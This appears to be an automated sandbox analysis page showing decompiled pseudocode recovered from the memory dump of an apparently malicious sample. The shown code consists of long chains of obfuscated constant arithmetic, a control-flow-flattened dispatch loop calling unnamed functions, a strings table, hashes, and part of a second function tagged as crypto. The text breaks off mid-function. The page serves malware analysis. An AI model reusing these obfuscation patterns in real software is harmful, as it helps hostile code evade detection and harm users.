				_v236 = 0xebcdd9;
				_v236 = _v236 + 0xffff32a9;
				_v236 = _v236 / _t916;
				_v236 = _v236 ^ 0x0004a748;
				_v136 = 0x23cd97;
				_t917 = 0x4c;
				_v136 = _v136 / _t917;
				_v136 = _v136 ^ 0x000f4235;
				_v320 = 0x4d819e;
				_v320 = _v320 + 0xffff59a4;
				_t918 = 0x45;
				_v320 = _v320 / _t918;
				_v320 = _v320 + 0xffff3895;
				_v320 = _v320 ^ 0x0001c602;
				_v344 = 0xb4c6e0;
				_v344 = _v344 >> 0x10;
				_v344 = _v344 + 0x799f;
				_v344 = _v344 + 0xffffbc81;
				_v344 = _v344 ^ 0x0002d9ef;
				_v128 = 0x4f54de;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 ^ 0x00053c32;
				_v268 = 0x176356;
				_v268 = _v268 >> 3;
				_v268 = _v268 * 0x1d;
				_v268 = _v268 ^ 0x005f9f9a;
				_v260 = 0x1003dd;
				_v260 = _v260 >> 5;
				_v260 = _v260 >> 0xf;
				_v260 = _v260 ^ 0x0004fa47;
				_v192 = 0xf049bd;
				_v192 = _v192 >> 6;
				_v192 = _v192 ^ 0x000ebb9c;
				_v204 = 0x77f092;
				_v204 = _v204 ^ 0x0888cc2a;
				_v204 = _v204 * 0xa;
				_v204 = _v204 ^ 0x59f833f3;
				_v120 = 0xc39394;
				_v120 = _v120 ^ 0xa5000bf8;
				_v120 = _v120 ^ 0xa5cbd510;
				_v280 = 0x16f38f;
				_v280 = _v280 ^ 0xb7b39911;
				_v280 = _v280 << 5;
				_v280 = _v280 ^ 0xf4ae8a62;
				_v416 = 0xc8df40;
				_v416 = _v416 + 0xffff9a73;
				_v416 = _v416 << 2;
				_v416 = _v416 + 0xde3e;
				_v416 = _v416 ^ 0x032ae0c4;
				_v408 = 0xb6b7dc;
				_v408 = _v408 | 0x1d048797;
				_v408 = _v408 ^ 0x94b64be8;
				_v408 = _v408 ^ 0x890ec1b7;
				_v88 = 0x71711;
				_v88 = _v88 << 0xb;
				_v88 = _v88 ^ 0x38b17380;
				_v328 = 0x6aef7d;
				_v328 = _v328 | 0x3603473e;
				_v328 = _v328 << 9;
				_v328 = _v328 >> 3;
				_v328 = _v328 ^ 0x1af8f484;
				_v176 = 0x792835;
				_v176 = _v176 >> 1;
				_v176 = _v176 ^ 0x0036a652;
				_v252 = 0x9468d7;
				_v252 = _v252 + 0x7830;
				_v252 = _v252 ^ 0xd0ee3c59;
				_v252 = _v252 ^ 0xd072a278;
				_v196 = 0xd921a2;
				_v196 = _v196 + 0xffff3880;
				_v196 = _v196 ^ 0x00d95c51;
				_v212 = 0x870085;
				_t919 = 0x69;
				_v212 = _v212 / _t919;
				_t920 = 0x78;
				_v212 = _v212 * 0x2e;
				_v212 = _v212 ^ 0x003b57a7;
				_v160 = 0x2d1808;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0xa3079107;
				_v400 = 0xdd20ad;
				_v400 = _v400 << 1;
				_v400 = _v400 + 0xff0c;
				_v400 = _v400 / _t920;
				_v400 = _v400 ^ 0x0009d535;
				_v168 = 0xb5e108;
				_t921 = 0x28;
				_v168 = _v168 * 0x7e;
				_v168 = _v168 ^ 0x598f807d;
				_v100 = 0xcc7cfc;
				_v100 = _v100 << 1;
				_v100 = _v100 ^ 0x019cfda6;
				_v360 = 0x2020d1;
				_v360 = _v360 / _t921;
				_v360 = _v360 ^ 0xa4368d26;
				_v360 = _v360 + 0xffff6dea;
				_v360 = _v360 ^ 0xa439a72f;
				_v300 = 0x9a8970;
				_v300 = _v300 + 0x6ac3;
				_v300 = _v300 ^ 0xdf533136;
				_v300 = _v300 ^ 0xdfcc7ab7;
				_v336 = 0x4d2f66;
				_v336 = _v336 ^ 0xb8468911;
				_v336 = _v336 >> 9;
				_t922 = 0x2c;
				_v336 = _v336 / _t922;
				_v336 = _v336 ^ 0x0008a1e2;
				_v152 = 0x8d8bb4;
				_v152 = _v152 + 0xf34a;
				_v152 = _v152 ^ 0x0088ea9a;
				_v92 = 0xebdf2a;
				_v92 = _v92 + 0x1fc0;
				_v92 = _v92 ^ 0x00e0ef1e;
				_v244 = 0xde57cd;
				_t923 = 0x5e;
				_v244 = _v244 * 0x51;
				_v244 = _v244 << 1;
				_v244 = _v244 ^ 0x8cb9eb22;
				_v352 = 0x84200;
				_v352 = _v352 >> 7;
				_v352 = _v352 + 0x9bd1;
				_v352 = _v352 | 0xc56dbf5a;
				_v352 = _v352 ^ 0xc568fd6f;
				_v392 = 0x204a7e;
				_t391 =  &_v392; // 0x204a7e
				_v392 =  *_t391 * 0x7e;
				_v392 = _v392 + 0xdaeb;
				_v392 = _v392 | 0x2df721c0;
				_v392 = _v392 ^ 0x2ffae543;
				_v172 = 0x96349f;
				_v172 = _v172 + 0xffff1d8a;
				_v172 = _v172 ^ 0x0098dfc1;
				_v296 = 0x3cde35;
				_v296 = _v296 * 0x41;
				_v296 = _v296 + 0xffff7ce3;
				_v296 = _v296 ^ 0x0f755d51;
				_v180 = 0xa031bd;
				_v180 = _v180 + 0xa275;
				_v180 = _v180 ^ 0x00a7d974;
				_v272 = 0xb7c84a;
				_v272 = _v272 / _t923;
				_v272 = _v272 | 0xd44a22c1;
				_v272 = _v272 ^ 0xd440a7e0;
				_v312 = 0xb76f0b;
				_t924 = 0x54;
				_v312 = _v312 / _t924;
				_v312 = _v312 ^ 0x75c1d9a4;
				_v312 = _v312 ^ 0x75cdcef1;
				_v396 = 0x8eadc4;
				_v396 = _v396 | 0x5ef2844f;
				_t925 = 0x37;
				_v396 = _v396 * 0x70;
				_v396 = _v396 | 0xb52ece17;
				_v396 = _v396 ^ 0xbf68d27f;
				_v412 = 0xed4711;
				_v412 = _v412 / _t925;
				_t926 = 0x64;
				_v412 = _v412 / _t926;
				_v412 = _v412 << 6;
				_v412 = _v412 ^ 0x00074caa;
				_v164 = 0x9f0f24;
				_v164 = _v164 << 0x10;
				_v164 = _v164 ^ 0x0f2a873f;
				_v288 = 0x8fa230;
				_v288 = _v288 + 0xf8b3;
				_v288 = _v288 + 0xffff5eba;
				_v288 = _v288 ^ 0x0084fab5;
				_v264 = 0x25d466;
				_v264 = _v264 ^ 0xc8fa4bab;
				_v264 = _v264 << 0xd;
				_v264 = _v264 ^ 0xf3f19765;
				_v388 = 0xa70662;
				_v388 = _v388 ^ 0x76435d5f;
				_v388 = _v388 ^ 0xce62b89b;
				_t927 = 0xd;
				_v388 = _v388 / _t927;
				_v388 = _v388 ^ 0x0e3f124f;
				_v148 = 0x6ec34e;
				_t928 = 0x39;
				_v148 = _v148 * 0x4b;
				_v148 = _v148 ^ 0x207f0473;
				_v420 = 0x5b05ef;
				_v420 = _v420 * 0x25;
				_v420 = _v420 >> 6;
				_v420 = _v420 * 0x7c;
				_v420 = _v420 ^ 0x1974bb04;
				_v368 = 0x435f28;
				_v368 = _v368 + 0xffffc274;
				_v368 = _v368 * 0x6e;
				_v368 = _v368 | 0xd65eea1e;
				_v368 = _v368 ^ 0xded0429e;
				_v304 = 0x93c507;
				_v304 = _v304 << 7;
				_v304 = _v304 << 1;
				_v304 = _v304 ^ 0x93c7b412;
				_v372 = 0x3ab09e;
				_v372 = _v372 / _t928;
				_v372 = _v372 + 0x9840;
				_v372 = _v372 << 5;
				_v372 = _v372 ^ 0x003f3225;
				_v140 = 0xe0922e;
				_t929 = 0x35;
				_v140 = _v140 / _t929;
				_v140 = _v140 ^ 0x000de06a;
				_v380 = 0x9cee9c;
				_v380 = _v380 >> 7;
				_v380 = _v380 ^ 0x8b8b39e1;
				_v380 = _v380 | 0xd3725c45;
				_v380 = _v380 ^ 0xdbf3b506;
				_v124 = 0x14c858;
				_v124 = _v124 >> 5;
				_v124 = _v124 ^ 0x0005cb8b;
				_v340 = 0xcdac83;
				_v340 = _v340 << 0xc;
				_v340 = _v340 + 0xffff54ea;
				_v340 = _v340 * 0x4c;
				_v340 = _v340 ^ 0xf33e9117;
				_v232 = 0x8765f2;
				_v232 = _v232 + 0xffffd3a6;
				_v232 = _v232 ^ 0xbeaac7fe;
				_v232 = _v232 ^ 0xbe2d6bbf;
				_v240 = 0x74f089;
				_t1033 = 0x5cbacf6;
				_v240 = _v240 / _t929;
				_v240 = _v240 + 0xe71;
				_t1036 = 0xb521822;
				_v240 = _v240 ^ 0x0001dcb0;
				_v132 = 0x92ec18;
				_v132 = _v132 | 0xb5e13100;
				_v132 = _v132 ^ 0xb5fff93b;
				_v248 = 0x8e7a84;
				_t930 = 0x73;
				_v248 = _v248 / _t930;
				_v248 = _v248 >> 0xa;
				_v248 = _v248 ^ 0x0002468b;
				_v348 = 0x178165;
				_v348 = _v348 >> 0xa;
				_v348 = _v348 ^ 0xbf9cbca8;
				_v348 = _v348 ^ 0x63b24424;
				_v348 = _v348 ^ 0xdc254682;
				_v216 = 0xca158b;
				_t931 = 0x24;
				_v216 = _v216 * 0x6c;
				_v216 = _v216 + 0xffffa472;
				_v216 = _v216 ^ 0x5540f783;
				_v108 = 0x25d03d;
				_v108 = _v108 + 0x8456;
				_v108 = _v108 ^ 0x0026e62d;
				_v116 = 0x466460;
				_v116 = _v116 >> 0xc;
				_v116 = _v116 ^ 0x00061b51;
				_v188 = 0x2458d2;
				_v188 = _v188 + 0xbdd1;
				_v188 = _v188 ^ 0x002ec5b3;
				_v308 = 0x164457;
				_v308 = _v308 ^ 0x6f362586;
				_v308 = _v308 << 0xc;
				_v308 = _v308 ^ 0x061164e6;
				_v228 = 0xcf6c57;
				_v228 = _v228 | 0x3a05c2af;
				_v228 = _v228 << 5;
				_v228 = _v228 ^ 0x59fbbcc5;
				_v200 = 0xeb4a20;
				_t651 =  &_v200; // 0xeb4a20
				_v200 =  *_t651 / _t931;
				_v200 = _v200 >> 6;
				_v200 = _v200 ^ 0x000523f8;
				_v324 = 0xe1c19f;
				_v324 = _v324 ^ 0x6d349ec6;
				_v324 = _v324 + 0x697d;
				_v324 = _v324 ^ 0xf263d816;
				_v324 = _v324 ^ 0x9fb84d00;
				_v208 = 0x55635;
				_t932 = 0x1c;
				_v208 = _v208 / _t932;
				_v208 = _v208 * 0x2b;
				_v208 = _v208 ^ 0x000a980b;
				while(1) {
					L1:
					_t1012 = 0xd88e65a;
					_t933 = 0x5074933;
					_t861 = 0x8738794;
					do {
						while(1) {
							L2:
							_t1047 = _t906 - _t861;
							if(_t1047 <= 0) {
								break;
							}
							__eflags = _t906 - _t1036;
							if(__eflags == 0) {
								_push(_v380);
								_t862 = E048C3F5C(_v372, _v140, __eflags);
								_t936 = 0x48c1180;
								_t1037 = _t862;
								_v44 = _v256;
								_v40 = _v364;
								_v36 = _v356;
								_t869 = E048E0A43( *0x48e6048 + 0x20, _v124,  *((intOrPtr*)( *0x48e6048 + 0x68)), _t862, _v340, _v224, _v232, _t936,  &_v44, _t936, _v240, _v132, _v248, _v348,  *((intOrPtr*)( *0x48e6048 + 0x64)), _v80);
								_t1043 =  &(_t1043[0xe]);
								__eflags = _t869 - _v332;
								if(_t869 != _v332) {
									_t906 = 0x2b3d0f8;
								} else {
									_t906 = _t1033;
									_t1041 = 1;
								}
								E048E0352(_v216, _v108, _t1037, _v116);
								L24:
								_t1012 = 0xd88e65a;
								_t933 = 0x5074933;
								_t1036 = 0xb521822;
								_t861 = 0x8738794;
								goto L25;
							}
							__eflags = _t906 - 0xbe90c6a;
							if(__eflags == 0) {
								_t906 = 0x3f3ad8a;
								continue;
							}
							__eflags = _t906 - _t1012;
							if(__eflags != 0) {
								goto L25;
							}
							_push(_v180);
							_t872 = E048C3F5C(_v172, _v296, __eflags);
							_t964 = 0x48c10a0;
							__eflags = E048D55BD( &_v76,  *0x48e6048 + 0x68, _t872, _v272, _t964, _v80, _v312, _v396, _v404, _v412, _v164, _v288) - _v156;
							_t906 =  ==  ? 0x8738794 : _t1033;
							E048E0352(_v264, _v388, _t872, _v148);
							_t1043 =  &(_t1043[0xc]);
							goto L24;
						}
						if(_t1047 == 0) {
							_push(_t933);
							_t943 = E048CF38A( *((intOrPtr*)( *0x48e6048 + 0x68)));
							__eflags = _t943;
							_t906 =  !=  ? _t1036 : _t1033;
							 *((intOrPtr*)( *0x48e6048 + 0x64)) = _t943;
							while(1) {
								L1:
								_t1012 = 0xd88e65a;
								_t933 = 0x5074933;
								_t861 = 0x8738794;
								goto L2;
							}
						}
						if(_t906 == 0x2b3d0f8) {
							E048C2043( *((intOrPtr*)( *0x48e6048 + 0x64)), _v188, _v308, _v228);
							_t906 = _t1033;
							goto L1;
						}
						if(_t906 == 0x3f3ad8a) {
							_push(_v104);
							_push(0x48c1120);
							_t884 = E048C3F5C(_v84, _v144, __eflags);
							_push(_v384);
							_push(0x48c1030);
							__eflags = E048D54FD(_v376,  &_v80, _t884, _v236, _v136, _v276, _v320, E048C3F5C(_v220, _v284, __eflags)) - _v96;
							_t906 =  ==  ? 0x5074933 : 0x6145fc;
							E048E0352(_v344, _v128, _t884, _v268);
							E048E0352(_v260, _v192, _t885, _v204);
							_t1043 =  &(_t1043[0xe]);
							L11:
							_t1033 = 0x5cbacf6;
							goto L24;
						}
						if(_t906 == _t933) {
							_push(_v416);
							_push(0x48c1070);
							_t891 = E048C3F5C(_v120, _v280, __eflags);
							_push(_v328);
							_t1035 = _t891;
							_push(0x48c1100);
							_t892 = E048C3F5C(_v408, _v88, __eflags);
							_v64 = _v184;
							_t894 = E048DF6D3(_v176, _v252, _v196, _t1035);
							_v56 = _v56 & 0x00000000;
							_v60 = _t1035;
							_v68 = 2 + _t894 * 2;
							_v48 =  &_v68;
							_t897 = 0x20;
							_v76 = _t897;
							_v52 = 1;
							__eflags = E048CD9C6(_v72,  &_v32, _v212, _v160, _v112, _t892, _v400,  &_v76, _v168, _v100,  &_v56, _t897, _v360, _v300) - _v292;
							_t906 =  ==  ? 0xd88e65a : 0x5cbacf6;
							E048E0352(_v336, _v152, _t1035, _v92);
							E048E0352(_v244, _v352, _t892, _v392);
							_t1043 =  &(_t1043[0x16]);
							goto L11;
						}
						if(_t906 != _t1033) {
							goto L25;
						}
						E048C2153(_v316, _v200, _v324, _v80, _v208);
						L9:
						return _t1041;
						L25:
						__eflags = _t906 - 0x6145fc;
					} while (__eflags != 0);
					goto L9;
				}
			}

0x048c758f
0x048c7595
0x048c75ae
0x048c75b5
0x048c75be
0x048c75c5
0x048c75cc
0x048c75d1
0x048c75da
0x048c75e5
0x048c75ed
0x048c75f5
0x048c75fd
0x048c7605
0x048c760d
0x048c7618
0x048c7620
0x048c762b
0x048c7636
0x048c7649
0x048c764c
0x048c7653
0x048c765e
0x048c7669
0x048c7671
0x048c767c
0x048c7687
0x048c768f
0x048c769a
0x048c76a5
0x048c76b0
0x048c76b8
0x048c76c3
0x048c76d3
0x048c76dc
0x048c76df
0x048c76e3
0x048c76eb
0x048c76f3
0x048c76fe
0x048c7709
0x048c7714
0x048c771f
0x048c772a
0x048c7732
0x048c773d
0x048c7745
0x048c774d
0x048c775d
0x048c7761
0x048c7769
0x048c7771
0x048c7776
0x048c777e
0x048c7783
0x048c778b
0x048c7793
0x048c7798
0x048c77a1
0x048c77a4
0x048c77aa
0x048c77af
0x048c77ba
0x048c77c5
0x048c77d0
0x048c77db
0x048c77e3
0x048c77ee
0x048c77f9
0x048c7804
0x048c780f
0x048c781a
0x048c7822
0x048c782d
0x048c7838
0x048c784d
0x048c7850
0x048c7857
0x048c7862
0x048c786d
0x048c7875
0x048c787d
0x048c7882
0x048c788a
0x048c7892
0x048c789a
0x048c78a2
0x048c78aa
0x048c78af
0x048c78b7
0x048c78c2
0x048c78d8
0x048c78df
0x048c78ea
0x048c78fc
0x048c7901
0x048c790a
0x048c7915
0x048c791d
0x048c7929
0x048c792c
0x048c7930
0x048c7938
0x048c7940
0x048c7948
0x048c794d
0x048c7955
0x048c795d
0x048c7965
0x048c7970
0x048c7978
0x048c7983
0x048c798e
0x048c799e
0x048c79a5
0x048c79b0
0x048c79bb
0x048c79c3
0x048c79cb
0x048c79d6
0x048c79e1
0x048c79e9
0x048c79f4
0x048c79ff
0x048c7a12
0x048c7a19
0x048c7a26
0x048c7a31
0x048c7a3c
0x048c7a47
0x048c7a52
0x048c7a5d
0x048c7a65
0x048c7a70
0x048c7a78
0x048c7a80
0x048c7a85
0x048c7a8d
0x048c7a95
0x048c7a9d
0x048c7aad
0x048c7ab5
0x048c7abd
0x048c7ac8
0x048c7ad0
0x048c7adb
0x048c7ae3
0x048c7aeb
0x048c7af0
0x048c7af5
0x048c7afd
0x048c7b08
0x048c7b0f
0x048c7b1a
0x048c7b25
0x048c7b30
0x048c7b3b
0x048c7b46
0x048c7b51
0x048c7b5c
0x048c7b67
0x048c7b7b
0x048c7b80
0x048c7b91
0x048c7b94
0x048c7b9b
0x048c7ba6
0x048c7bb1
0x048c7bb9
0x048c7bc4
0x048c7bcc
0x048c7bd0
0x048c7be0
0x048c7be4
0x048c7bec
0x048c7bff
0x048c7c00
0x048c7c07
0x048c7c12
0x048c7c1d
0x048c7c24
0x048c7c2f
0x048c7c3d
0x048c7c41
0x048c7c49
0x048c7c51
0x048c7c59
0x048c7c64
0x048c7c6f
0x048c7c7a
0x048c7c85
0x048c7c8f
0x048c7c97
0x048c7ca2
0x048c7ca7
0x048c7cad
0x048c7cb5
0x048c7cc0
0x048c7ccb
0x048c7cd6
0x048c7ce1
0x048c7cec
0x048c7cf7
0x048c7d0a
0x048c7d0d
0x048c7d14
0x048c7d1b
0x048c7d26
0x048c7d2e
0x048c7d33
0x048c7d3b
0x048c7d43
0x048c7d4b
0x048c7d53
0x048c7d58
0x048c7d5c
0x048c7d64
0x048c7d6c
0x048c7d74
0x048c7d7f
0x048c7d8a
0x048c7d95
0x048c7da8
0x048c7daf
0x048c7dba
0x048c7dc5
0x048c7dd0
0x048c7ddb
0x048c7de6
0x048c7dfc
0x048c7e03
0x048c7e0e
0x048c7e19
0x048c7e2b
0x048c7e30
0x048c7e39
0x048c7e44
0x048c7e4f
0x048c7e57
0x048c7e64
0x048c7e67
0x048c7e6b
0x048c7e73
0x048c7e7b
0x048c7e8b
0x048c7e93
0x048c7e96
0x048c7e9a
0x048c7e9f
0x048c7ea9
0x048c7eb4
0x048c7ebc
0x048c7ec7
0x048c7ed2
0x048c7edd
0x048c7ee8
0x048c7ef3
0x048c7efe
0x048c7f09
0x048c7f11
0x048c7f1c
0x048c7f24
0x048c7f2c
0x048c7f3a
0x048c7f3f
0x048c7f45
0x048c7f4d
0x048c7f60
0x048c7f63
0x048c7f6a
0x048c7f75
0x048c7f82
0x048c7f86
0x048c7f90
0x048c7f94
0x048c7f9c
0x048c7fa4
0x048c7fb1
0x048c7fb5
0x048c7fbd
0x048c7fc5
0x048c7fd0
0x048c7fd8
0x048c7fdf
0x048c7fea
0x048c7ffa
0x048c7ffe
0x048c8006
0x048c800b
0x048c8013
0x048c8025
0x048c8028
0x048c802f
0x048c803a
0x048c8042
0x048c8047
0x048c804f
0x048c8057
0x048c805f
0x048c806a
0x048c8072
0x048c807d
0x048c8085
0x048c808a
0x048c8097
0x048c809b
0x048c80a3
0x048c80ae
0x048c80b9
0x048c80c4
0x048c80cf
0x048c80e3
0x048c80ec
0x048c80f5
0x048c8100
0x048c8105
0x048c8110
0x048c811b
0x048c8126
0x048c8131
0x048c8143
0x048c8148
0x048c8151
0x048c8159
0x048c8164
0x048c816c
0x048c8171
0x048c8179
0x048c8181
0x048c8189
0x048c819c
0x048c819f
0x048c81a6
0x048c81b1
0x048c81bc
0x048c81c7
0x048c81d2
0x048c81dd
0x048c81e8
0x048c81f0
0x048c81fb
0x048c8206
0x048c8211
0x048c821c
0x048c8227
0x048c8232
0x048c823a
0x048c8245
0x048c8250
0x048c825b
0x048c8263
0x048c826e
0x048c8279
0x048c8284
0x048c828b
0x048c8293
0x048c829e
0x048c82a6
0x048c82ae
0x048c82b6
0x048c82be
0x048c82c6
0x048c82d8
0x048c82db
0x048c82ea
0x048c82f1
0x048c82fc
0x048c82fc
0x048c82fc
0x048c8301
0x048c8306
0x048c830b
0x048c830b
0x048c830b
0x048c830b
0x048c830d
0x00000000
0x00000000
0x048c85e4
0x048c85e6
0x048c86a8
0x048c86bc
0x048c86c2
0x048c86c3
0x048c86cc
0x048c86d7
0x048c86e9
0x048c8743
0x048c8748
0x048c874b
0x048c874f
0x048c8758
0x048c8751
0x048c8753
0x048c8755
0x048c8755
0x048c8773
0x048c877a
0x048c877a
0x048c877f
0x048c8784
0x048c8789
0x00000000
0x048c8789
0x048c85ec
0x048c85f2
0x048c869e
0x00000000
0x048c869e
0x048c85f8
0x048c85fa
0x00000000
0x00000000
0x048c8600
0x048c861a
0x048c8620
0x048c8674
0x048c868d
0x048c8691
0x048c8696
0x00000000
0x048c8696
0x048c8313
0x048c85c3
0x048c85ce
0x048c85d7
0x048c85d9
0x048c85dc
0x048c82fc
0x048c82fc
0x048c82fc
0x048c8301
0x048c8306
0x00000000
0x048c8306
0x048c82fc
0x048c831f
0x048c85a1
0x048c85a8
0x00000000
0x048c85a8
0x048c832b
0x048c84c0
0x048c84d5
0x048c84da
0x048c84df
0x048c84f3
0x048c853b
0x048c8557
0x048c855b
0x048c8576
0x048c857b
0x048c84b6
0x048c84b6
0x00000000
0x048c84b6
0x048c8333
0x048c8372
0x048c8384
0x048c8389
0x048c838e
0x048c8399
0x048c839f
0x048c83a4
0x048c83c8
0x048c83cf
0x048c83e4
0x048c83f3
0x048c83fa
0x048c8408
0x048c840f
0x048c8417
0x048c8422
0x048c847c
0x048c8491
0x048c8499
0x048c84ae
0x048c84b3
0x00000000
0x048c84b3
0x048c8337
0x00000000
0x00000000
0x048c835d
0x048c8367
0x048c8371
0x048c878e
0x048c878e
0x048c878e
0x00000000
0x048c879a

Strings

J, xrefs: 048C8279
-&, xrefs: 048C81D2
}j, xrefs: 048C7ADB
]q<x, xrefs: 048C7709
j, xrefs: 048C802F
f/M, xrefs: 048C7C85
fW, xrefs: 048C7671
(_C, xrefs: 048C7F9C
%2?, xrefs: 048C800B
}i, xrefs: 048C82AE
~J , xrefs: 048C7D53
5(y, xrefs: 048C7AFD
0x, xrefs: 048C7B25
, xrefs: 048C77AA
`dF, xrefs: 048C81DD

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: $ J$%2?$(_C$-&$0x$5(y$]q<x$`dF$f/M$fW$j$}i$}j$~J
API String ID: 0-1192029311
Opcode ID: d0b1e6a032d8a8231f33015c877b50f8038a0e4ecdb06f76825d65763663187e
Instruction ID: d1442ad41cedad1757e4a74138a5184ab687639dc1c5424e9fe46785234e6262
Opcode Fuzzy Hash: d0b1e6a032d8a8231f33015c877b50f8038a0e4ecdb06f76825d65763663187e
Instruction Fuzzy Hash: 0492EF711093809FD3B8CF65C58AB9BBBE2BBC5304F108D1DE68A96260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 048CEC27, Relevance: 17.8, Strings: 14, Instructions: 344
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E048CEC27() {
				void* _t331;
				signed int _t335;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t348;
				void* _t356;
				signed int _t398;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t411;
				signed int* _t415;

				 *_t415 = 0x2ff1b4;
				 *_t415 =  *_t415 ^ 0xfb7fa6b0;
				_t356 = 0x7034cb8;
				 *_t415 =  *_t415 << 0xb;
				 *_t415 =  *_t415 + 0xffff0add;
				 *_t415 =  *_t415 ^ 0x82b72adc;
				_t415[0x14] = 0xbf0c8a;
				_t415[0x14] = _t415[0x14] ^ 0x006819fa;
				_t415[0x14] = _t415[0x14] << 1;
				_t415[0x14] = _t415[0x14] ^ 0x01ae2ae1;
				_t415[7] = 0x4b071f;
				_t415[7] = _t415[7] + 0xf3fd;
				_t415[0xb] = _t415[7] * 0x72;
				_t415[0xb] = _t415[0xb] + 0x6430;
				_t415[0xb] = _t415[0xb] ^ 0x21d636ab;
				_t415[0x19] = 0x60fe16;
				_t401 = 0x71;
				_t415[0x1a] = _t415[0x19] / _t401;
				_t415[0x1a] = _t415[0x1a] ^ 0xe1d295b7;
				_t415[0x1a] = _t415[0x1a] ^ 0xe1d72c2a;
				_t415[0x1e] = 0xef1996;
				_t415[0x1e] = _t415[0x1e] << 0x10;
				_t415[0x1e] = _t415[0x1e] ^ 0x1993fea0;
				_t415[0x16] = 0xfd2420;
				_t415[0x16] = _t415[0x16] << 0xc;
				_t415[0x16] = _t415[0x16] ^ 0x923e3d3c;
				_t415[0x16] = _t415[0x16] ^ 0x4078d4fe;
				_t415[0x23] = 0x506b21;
				_t415[0x23] = _t415[0x23] << 2;
				_t415[0x23] = _t415[0x23] ^ 0x0143b977;
				_t415[0x1c] = 0x53eeda;
				_t415[0x1c] = _t415[0x1c] >> 6;
				_t402 = 0x6b;
				_t415[0x1c] = _t415[0x1c] / _t402;
				_t415[0x1c] = _t415[0x1c] ^ 0x000e3127;
				_t415[9] = 0x7cf73b;
				_t415[9] = _t415[9] + 0xdf44;
				_t415[9] = _t415[9] ^ 0xb8aac642;
				_t403 = 0x62;
				_t415[0x24] = _t415[0x24] & 0x00000000;
				_t415[8] = _t415[9] / _t403;
				_t415[8] = _t415[8] ^ 0x01e7107a;
				_t415[0x1a] = 0xb1d3c8;
				_t404 = 0x32;
				_t415[0x1a] = _t415[0x1a] * 0x63;
				_t415[0x1a] = _t415[0x1a] + 0xffff41e1;
				_t415[0x1a] = _t415[0x1a] ^ 0x44c3ceda;
				_t415[0xf] = 0x67a0a3;
				_t415[0xf] = _t415[0xf] >> 5;
				_t415[0xf] = _t415[0xf] * 0x25;
				_t415[0xf] = _t415[0xf] + 0xffffd46f;
				_t415[0xf] = _t415[0xf] ^ 0x0079d095;
				_t415[0x20] = 0x939f69;
				_t415[0x20] = _t415[0x20] >> 9;
				_t415[0x20] = _t415[0x20] ^ 0x000645bf;
				_t415[0xd] = 0x6e98c3;
				_t415[0xd] = _t415[0xd] + 0x1b48;
				_t415[0xd] = _t415[0xd] / _t404;
				_t415[0xd] = _t415[0xd] + 0x30f9;
				_t415[0xd] = _t415[0xd] ^ 0x000343da;
				_t415[9] = 0xd47c54;
				_t405 = 0x11;
				_t415[0xa] = _t415[9] * 0x6b;
				_t415[0xa] = _t415[0xa] + 0x327b;
				_t415[0xa] = _t415[0xa] ^ 0x58de0f5c;
				_t415[0x14] = 0xbee5f4;
				_t415[0x14] = _t415[0x14] + 0x4a9a;
				_t415[0x14] = _t415[0x14] ^ 0xc7bb3bda;
				_t415[0x14] = _t415[0x14] ^ 0xc703792a;
				_t415[0x18] = 0x5f34c8;
				_t415[0x18] = _t415[0x18] >> 8;
				_t415[0x18] = _t415[0x18] + 0xdb9e;
				_t415[0x18] = _t415[0x18] ^ 0x000f0254;
				_t415[0x13] = 0x654d4c;
				_t415[0x13] = _t415[0x13] | 0x499231ac;
				_t415[0x13] = _t415[0x13] << 6;
				_t415[0x13] = _t415[0x13] ^ 0x7dd8fb23;
				_t415[0x22] = 0x533eec;
				_t415[0x22] = _t415[0x22] + 0xffff246b;
				_t415[0x22] = _t415[0x22] ^ 0x0053814d;
				_t415[6] = 0xb05f93;
				_t415[6] = _t415[6] ^ 0xf9d4ab47;
				_t415[6] = _t415[6] + 0xffff6279;
				_t415[6] = _t415[6] >> 8;
				_t415[6] = _t415[6] ^ 0x00fd3243;
				_t415[0x20] = 0xf7b530;
				_t415[0x20] = _t415[0x20] + 0xa986;
				_t415[0x20] = _t415[0x20] ^ 0x00f31461;
				_t415[0xb] = 0xc0c98a;
				_t415[0xb] = _t415[0xb] | 0xbc477ada;
				_t415[0xb] = _t415[0xb] ^ 0xd17e365f;
				_t415[0xb] = _t415[0xb] + 0xfbc8;
				_t415[0xb] = _t415[0xb] ^ 0x6db6a54b;
				_t415[0x11] = 0x3df948;
				_t415[0x11] = _t415[0x11] | 0x554c1cf4;
				_t415[0x11] = _t415[0x11] + 0xffff3939;
				_t415[0x11] = _t415[0x11] + 0x48bd;
				_t415[0x11] = _t415[0x11] ^ 0x557d8b89;
				_t415[0x17] = 0x443079;
				_t415[0x17] = _t415[0x17] << 6;
				_t415[0x17] = _t415[0x17] / _t405;
				_t415[0x17] = _t415[0x17] ^ 0x01083066;
				_t415[0x15] = 0x197a36;
				_t406 = 0x79;
				_t415[0x15] = _t415[0x15] / _t406;
				_t415[0x15] = _t415[0x15] | 0x00ca3701;
				_t415[0x15] = _t415[0x15] ^ 0x00cb182f;
				_t415[0x24] = 0x32bd0;
				_t407 = 0x6d;
				_t415[0x24] = _t415[0x24] * 0x68;
				_t415[0x24] = _t415[0x24] ^ 0x014cc366;
				_t415[8] = 0x233702;
				_t415[8] = _t415[8] / _t407;
				_t415[8] = _t415[8] + 0x77c9;
				_t415[8] = _t415[8] >> 0xb;
				_t415[8] = _t415[8] ^ 0x00057e5d;
				_t415[0xd] = 0x94260a;
				_t415[0xd] = _t415[0xd] ^ 0xf3ede0d3;
				_t408 = 0x42;
				_t415[0xc] = _t415[0xd] / _t408;
				_t415[0xc] = _t415[0xc] | 0xb02b0b60;
				_t415[0xc] = _t415[0xc] ^ 0xb3b4ff54;
				_t415[6] = 0x5dace2;
				_t415[6] = _t415[6] >> 6;
